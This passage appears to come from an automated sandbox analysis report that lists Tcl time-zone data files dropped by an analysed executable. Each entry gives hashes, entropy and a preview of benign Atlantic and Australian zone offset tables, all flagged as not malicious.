                                                                                                                                                                                                                                            MD5:77C7ECE4FCBE150069B611C75E8DAA0E
                                                                                                                                                                                                                                            SHA1:22F4E5F15BCA92D8456B70BB36230F2605CA5E1C
                                                                                                                                                                                                                                            SHA-256:F0E99EF01F140CD5AAFE16803A657922207E6F7F6AF10B0AE795790916C302C4
                                                                                                                                                                                                                                            SHA-512:6FB57E8499A587292AFAFA9BD003721572393D5268CAF956230DA76983A112B27D6731BE561A22CCEF84935F43AC988B667C2DC404C157EA8D0E7830FC1A2AB8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Stanley) {.. {-9223372036854775808 -13884 0 LMT}.. {-2524507716 -13884 0 SMT}.. {-1824235716 -14400 0 -04}.. {-1018209600 -10800 1 -04}.. {-1003093200 -14400 0 -04}.. {-986760000 -10800 1 -04}.. {-971643600 -14400 0 -04}.. {-954705600 -10800 1 -04}.. {-939589200 -14400 0 -04}.. {-923256000 -10800 1 -04}.. {-908139600 -14400 0 -04}.. {-891806400 -10800 1 -04}.. {-876690000 -14400 0 -04}.. {-860356800 -10800 1 -04}.. {420606000 -7200 0 -03}.. {433303200 -7200 1 -03}.. {452052000 -10800 0 -03}.. {464151600 -7200 1 -03}.. {483501600 -10800 0 -03}.. {495597600 -14400 0 -04}.. {495604800 -10800 1 -04}.. {514350000 -14400 0 -04}.. {527054400 -10800 1 -04}.. {545799600 -14400 0 -04}.. {558504000 -10800 1 -04}.. {577249200 -14400 0 -04}.. {589953600 -10800 1 -04}.. {608698800 -14400 0 -04}.. {621403200 -10800 1 -04}.. {640753200 -14400 0 -
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.862270414049974
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjpMFBx/h4QWCCj1:SlSWB9vsM3yI9kHAIgmON/2DCeMFB/4d
                                                                                                                                                                                                                                            MD5:2EF41863430897F45E0CBB51E6A44069
                                                                                                                                                                                                                                            SHA1:8E9561060E9509FAF235E5E033FC9C2918E438DB
                                                                                                                                                                                                                                            SHA-256:DF7CBDDCBB2F5926A07D19A35739E5B8DCD9733C037F7D1FF95753C28D574674
                                                                                                                                                                                                                                            SHA-512:9D3A37D64DCCCA28093C30FAB595690D021FACEC15F351A77CA33A779D645D305A2FA031869F0DE3B0404C498C2C321D3D02E4DC592D3C632F6700F5DCB54900
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/ACT) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8372
                                                                                                                                                                                                                                            Entropy (8bit):3.894755849491153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:j8SY62BXovlCyRL8pJXa4NyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:j8X3Xzgl3PaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                                            MD5:94E1A0C4326D09AF103107E64625CC6C
                                                                                                                                                                                                                                            SHA1:C026565F020EB158309549D98313632BAA79205F
                                                                                                                                                                                                                                            SHA-256:5C43D3152982BCFD5B9F51D0E909CF3A558BED1C270FEFFE030531D38D6F91B7
                                                                                                                                                                                                                                            SHA-512:CA08A8BC0EB740D59650FE0A9E56D9E169348AD0994F2BFFD6CCFBF9CC42E82F892FB719E80C4E2084B5702E9725C651359EE3066BD71BB19397EA83B6A68430
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Adelaide) {.. {-9223372036854775808 33260 0 LMT}.. {-2364110060 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1 ACDT}.. {320776200 34200 0 ACST}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):674
                                                                                                                                                                                                                                            Entropy (8bit):4.32071371733564
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862ELmdHLOYCvSi0xT0ryRIvUr0obZv:5ELe6dvSi6L
                                                                                                                                                                                                                                            MD5:900B39F1D4AB93A445F37B6C0A8DE3D9
                                                                                                                                                                                                                                            SHA1:DE82800779DCB8094C395B5024BD01FFA3C3BB8C
                                                                                                                                                                                                                                            SHA-256:0D3C39EDAB34A8DB31A658A1549772F7D69EB57565E40AA87B707953A2D854A4
                                                                                                                                                                                                                                            SHA-512:8D115D1D14FE6FF21A4AE77E3AAC075E6A877214E568956B9A4FD2E75A46E458CAA5AE26B483F128B4C62960D73BD7543BC32F22B760059423B3D9ABCBA24B6A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Brisbane) {.. {-9223372036854775808 36728 0 LMT}.. {-2366791928 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8437
                                                                                                                                                                                                                                            Entropy (8bit):3.902306256303896
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:QZSSY62BXovldRL8q75aANyPaNw0leasxMQ/UvuQPxBFNsLQ2nDs020DdDncIsea:QZSX3X2QfPaN8asiQ/Uv9UnvtCaRs
                                                                                                                                                                                                                                            MD5:1553DAAB804A6C9BB15D711554980D3B
                                                                                                                                                                                                                                            SHA1:5E3161B1FBB4C246DCB5E11ABD94095121CE38ED
                                                                                                                                                                                                                                            SHA-256:734F295BD0B558BDF6178DE62151B8913699D08AB2B1D101C55B8DEBC410074C
                                                                                                                                                                                                                                            SHA-512:06B21886070E39E390ECBD18841B7FDBFCA2C7C8573495D2BAA2B92EB113CD1C73C18D73C49DE3C49572CBCBCBED2FAD3248BC651BEB825A1E089B1DEDEFCBFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Broken_Hill) {.. {-9223372036854775808 33948 0 LMT}.. {-2364110748 36000 0 AEST}.. {-2314951200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}.. {31501800 34200 0 ACST}.. {57688200 37800 1 ACDT}.. {67969800 34200 0 ACST}.. {89137800 37800 1 ACDT}.. {100024200 34200 0 ACST}.. {120587400 37800 1 ACDT}.. {131473800 34200 0 ACST}.. {152037000 37800 1 ACDT}.. {162923400 34200 0 ACST}.. {183486600 37800 1 ACDT}.. {194977800 34200 0 ACST}.. {215541000 37800 1 ACDT}.. {226427400 34200 0 ACST}.. {246990600 37800 1 ACDT}.. {257877000 34200 0 ACST}.. {278440200 37800 1 ACDT}.. {289326600 34200 0 ACST}.. {309889800 37800 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):4.851279484907769
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjnSV1+QWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DCcq+DCyB
                                                                                                                                                                                                                                            MD5:8944D3DF8FBECC03A8FB18C3B2DA3B53
                                                                                                                                                                                                                                            SHA1:6B17B38D6560592CA49840C47DB9BDA7E79F9F76
                                                                                                                                                                                                                                            SHA-256:5FE3CED97293FE0573D5ECE0CEF59CE5DDB4C57BC568AE7199E77B01D3ADE17C
                                                                                                                                                                                                                                            SHA-512:907D8BB7EA840E0B3AC683884F2F709A2C06D67CE9258BE46400A0DA63581A9B1403A44FA43E1059BE8F5C7E06F9FA05C176309AD6295317BF14F0E9FA5741E4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/Canberra) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.79231670095588
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DCkx+4DCVDy:MByMjUQVv8At2s4Ky
                                                                                                                                                                                                                                            MD5:0C1DFC0877CE8EB08007B7C2B7AF2D87
                                                                                                                                                                                                                                            SHA1:02F835BE2DA4FCA79DC2A6959BB4EB6ACC8DF708
                                                                                                                                                                                                                                            SHA-256:1DD4EC4ED4F854E2EF6162B2F28C89208710F8EC5AABB95FFA9425D3FBBCAB13
                                                                                                                                                                                                                                            SHA-512:358347045915B7D10940DB15E49528D0C636BEC1BE70129847D0B9D034F9E96E847394D88358E87D98A9E581605A3C2AB917B85FDE1296F290B4194BB7E3FA46
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Currie) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):437
                                                                                                                                                                                                                                            Entropy (8bit):4.508468081487136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862pmdHPCvZUjMWpXgda/gd026Xgdvgd+v:5peKvZqMSX+4+56X+v+Q
                                                                                                                                                                                                                                            MD5:A81864B2C0BD7BF81F4FA21F17800059
                                                                                                                                                                                                                                            SHA1:518AC9E040A17083ED3962F4FBB47D1D83764FF7
                                                                                                                                                                                                                                            SHA-256:AC004FD4B3C536406991EC13EBB3E64E0EC0C7B264BC18C0700C8FA545868155
                                                                                                                                                                                                                                            SHA-512:3C24F4C2CC3072B3E820FCC1C68A747DCCBB9481FE743C1555783CC932DCBA44FE4851A732D24EABF62E845474D4E1278F120A04DB7549A18C7C49C31FB8D425
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Darwin) {.. {-9223372036854775808 31400 0 LMT}.. {-2364108200 32400 0 ACST}.. {-2230189200 34200 0 ACST}.. {-1672558200 37800 1 ACDT}.. {-1665387000 34200 0 ACST}.. {-883639800 37800 1 ACDT}.. {-876123000 34200 0 ACST}.. {-860398200 37800 1 ACDT}.. {-844673400 34200 0 ACST}.. {-828343800 37800 1 ACDT}.. {-813223800 34200 0 ACST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):759
                                                                                                                                                                                                                                            Entropy (8bit):4.110997549215461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862EmdHvOYCvV2mV22wF2nUV2CF2+V2pCwF21UF2biV2cHVKF25V2VF2cV2tFq:5Eemdvg2wQCKZ4j5c0LVmtH1iknohwQT
                                                                                                                                                                                                                                            MD5:1BC8DBD2E24606EFA49F933034FC0EEF
                                                                                                                                                                                                                                            SHA1:A511695A1B87A689C6BFF65257C11D3962FDDA3D
                                                                                                                                                                                                                                            SHA-256:79D0C770A304360DB33F3D1EF7B3935F1E4E8125893E0DCE683AC35A51302CFB
                                                                                                                                                                                                                                            SHA-512:A839D390D70F22FC833322029B732F3AE68FF48793B07005041BD12322DD6E5D5E5FF31787AA004A507A57F8FC245133891F266C4EF19D49F085E6B412E5B04C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Eucla) {.. {-9223372036854775808 30928 0 LMT}.. {-2337928528 31500 0 +0945}.. {-1672555500 35100 1 +0945}.. {-1665384300 31500 0 +0945}.. {-883637100 35100 1 +0945}.. {-876120300 31500 0 +0945}.. {-860395500 35100 1 +0945}.. {-844670700 31500 0 +0945}.. {-836473500 35100 0 +0945}.. {152039700 35100 1 +0945}.. {162926100 31500 0 +0945}.. {436295700 35100 1 +0945}.. {447182100 31500 0 +0945}.. {690311700 35100 1 +0945}.. {699383700 31500 0 +0945}.. {1165079700 35100 1 +0945}.. {1174756500 31500 0 +0945}.. {1193505300 35100 1 +0945}.. {1206810900 31500 0 +0945}.. {1224954900 35100 1 +0945}.. {1238260500 31500 0 +0945}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8734
                                                                                                                                                                                                                                            Entropy (8bit):3.8515786470328823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aOqigkx6WsYyS39nQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:aOq05hnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:5E04BF8E1DEBFCC4130FDD1BBD67B2DF
                                                                                                                                                                                                                                            SHA1:796AADCE7BB2FAF5E6FC916C941A4E3DCAFACC9E
                                                                                                                                                                                                                                            SHA-256:D813F6A97BEFC22CA4F24C59EB755D269B9C68A449CC7CF0D2C61F911860EBE7
                                                                                                                                                                                                                                            SHA-512:3A69CF1D1F57D6BD39E5F4DAF76BBB06A749D42BEB29452A0A5BDAA68F5DACC0DF176EDDA7A083F5B5B84FC651926C09D46CAAD2F6C4F1595AB9CCA1A958D653
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Hobart) {.. {-9223372036854775808 35356 0 LMT}.. {-2345795356 36000 0 AEST}.. {-1680508800 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-1646640000 39600 1 AEDT}.. {-1635753600 36000 0 AEST}.. {-1615190400 39600 1 AEDT}.. {-1604304000 36000 0 AEST}.. {-1583920800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {-94730400 36000 0 AEST}.. {-71136000 39600 1 AEDT}.. {-55411200 36000 0 AEST}.. {-37267200 39600 1 AEDT}.. {-25776000 36000 0 AEST}.. {-5817600 39600 1 AEDT}.. {5673600 36000 0 AEST}.. {25632000 39600 1 AEDT}.. {37728000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AES
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):199
                                                                                                                                                                                                                                            Entropy (8bit):4.912882643701746
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yIoGEoPHAIgjGg6N/2DCkx/2DCPGUv:MByMjeXV6t2a8v
                                                                                                                                                                                                                                            MD5:425DC7B1E31F4AA41DAD74E3C9AE3562
                                                                                                                                                                                                                                            SHA1:D92A3269F7BF5EC00F082C64CEF6E20C43017180
                                                                                                                                                                                                                                            SHA-256:4D84E4040FBC529C9E0366BB74D0CFADEEEEDA0DFCC6C2C9204DED6C6455CAC3
                                                                                                                                                                                                                                            SHA-512:F3031F16C0D00D9F8A38CD378F599EB3E63F4FF85F120DB38E3013E93F08E6F512D969F164BBC88CD625910FB3E086F3352E5B8FFC1373C3CC98F363FB3FD3F7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Lord_Howe)]} {.. LoadTimeZoneFile Australia/Lord_Howe..}..set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):824
                                                                                                                                                                                                                                            Entropy (8bit):4.249672335529665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862gtmdHVCvCi0xT0ryRIvUr0obbty/ywtUj3yv:5gteMvCi6Xlt8
                                                                                                                                                                                                                                            MD5:504A422280E0459A2126E7CB02F527E6
                                                                                                                                                                                                                                            SHA1:EF61B98EFB1E44EE59020E99A69EA67D6B8ACFC2
                                                                                                                                                                                                                                            SHA-256:01B278309353849CC2FDF62A30E2FF483833D5713CF5E329252738BE6F2C0A84
                                                                                                                                                                                                                                            SHA-512:BFDAAD56D817CD3AAB17DFD0A33EFDD422645BC542ABE269C0F8520E33796DF4F19EAB2E40BFC6C4AF93EF654239B8F2E285639B4662040D865B9C340A23CFAD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lindeman) {.. {-9223372036854775808 35756 0 LMT}.. {-2366790956 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {625593600 39600 1 AEDT}.. {636480000 36000 0 AEST}.. {657043200 39600 1 AEDT}.. {667929600 36000 0 AEST}.. {688492800 39600 1 AEDT}.. {699379200 36000 0 AEST}.. {709912800 36000 0 AEST}.. {719942400 39600 1 AEDT}.. {731433600 36000 0 AEST}.. {751996800 39600 1 AEDT}.. {762883200 36000 0 AEST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7764
                                                                                                                                                                                                                                            Entropy (8bit):3.5615258807990537
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                                            MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                                            SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                                            SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                                            SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8341
                                                                                                                                                                                                                                            Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                                            MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                                            SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                                            SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                                            SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                                            MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                                            SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                                            SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                                            SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                                            MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                                            SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                                            SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                                            SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):739
                                                                                                                                                                                                                                            Entropy (8bit):4.31793586514766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB8623mdHCBdCvmlXz6zezzOz4iaLYvzkzi4zm5fVcBhg8mfev:53eCB0v4+e3Oz4iaLYbkzi4zxhfqw
                                                                                                                                                                                                                                            MD5:01B1A88867472AD60B8F5C0E1648E3ED
                                                                                                                                                                                                                                            SHA1:9975EA750458E8061DD8A83585675CB7E4910CA6
                                                                                                                                                                                                                                            SHA-256:FC1B54CA261074E47A8A486FEAC12DD04D46166D1D2B44163BD8791BEC32D275
